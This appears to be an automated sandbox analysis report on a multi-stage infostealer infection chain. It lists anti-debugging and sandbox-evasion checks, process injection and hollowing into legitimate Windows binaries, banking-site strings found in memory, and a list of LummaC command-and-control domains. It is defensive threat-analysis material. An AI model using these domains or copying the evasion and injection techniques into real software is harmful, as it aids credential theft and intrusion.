Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Set-up.exe, 00000017.00000002.2762123605.000000000132E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: BitLockerToGo.exe, 00000025.00000002.2579761363.00000000029CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: svchost015.exe, 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxL
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Setup.exe, 0000001A.00000003.2411676685.0000000001371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.0000000001371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2412000367.0000000001371000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4{
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWjs
Source: file.exe, 00000000.00000002.1501525363.00000000009FB000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1529266935.00000000003AB000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Setup.exe, 0000001A.00000002.2756433325.0000000000881000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: @DefaultOpera BetaEdrawFree_PDF_SolutionsLenovoServiceBridgeVMware0
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_052201ED rdtsc

0_2_052201ED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_06E07E10 LdrInitializeThunk,

11_2_06E07E10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 14_2_00407AF1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

14_2_00407AF1

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 22_2_009E4610 VirtualProtect ?,00000004,00000100,00000000

22_2_009E4610

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_0049BDF9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_0049BDF9

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001E645B mov eax, dword ptr fs:[00000030h]	7_2_001E645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001EA1C2 mov eax, dword ptr fs:[00000030h]	7_2_001EA1C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0041913C mov eax, dword ptr fs:[00000030h]	14_2_0041913C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00411496 mov ecx, dword ptr fs:[00000030h]	14_2_00411496
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004AA0F2 mov eax, dword ptr fs:[00000030h]	19_2_004AA0F2
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004A638B mov eax, dword ptr fs:[00000030h]	19_2_004A638B
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0065A0F2 mov eax, dword ptr fs:[00000030h]	20_2_0065A0F2
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0065638B mov eax, dword ptr fs:[00000030h]	20_2_0065638B
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F9160 mov eax, dword ptr fs:[00000030h]	22_2_009F9160

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 14_2_0041EFC8 GetProcessHeap,

14_2_0041EFC8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00407AF1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00407AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00407C53 SetUnhandledExceptionFilter,	14_2_00407C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00407D65 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00407D65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0040DD68 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0040DD68
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0048D048 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0048D048
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004A690E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_004A690E
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0048DA05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0048DA05
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0048DB6A SetUnhandledExceptionFilter,	19_2_0048DB6A
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0063D048 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_0063D048
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0065690E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0065690E
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0063DA05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0063DA05
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009FC8D9 SetUnhandledExceptionFilter,	22_2_009FC8D9
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009FACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_009FACFA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009FA718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_009FA718
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C88B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_6C88B66C
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C88B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_6C88B1F7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_6CA3AC62

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe, type: DROPPED

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\1000238002\Amadeus.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 550000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\1000238002\Amadeus.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe

Code function: 9_2_02F72555 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

9_2_02F72555

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 550000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: Amadeus.exe, 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 22_2_009F90A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

22_2_009F90A0

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1036008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F5B008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 618008
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 550000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 551000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 591000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 594000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 5A3000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 452000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 464000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46B000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46C000
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5159008
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CE2008
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 441000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 444000
Source: C:\Users\user\1000238002\Amadeus.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BC7008
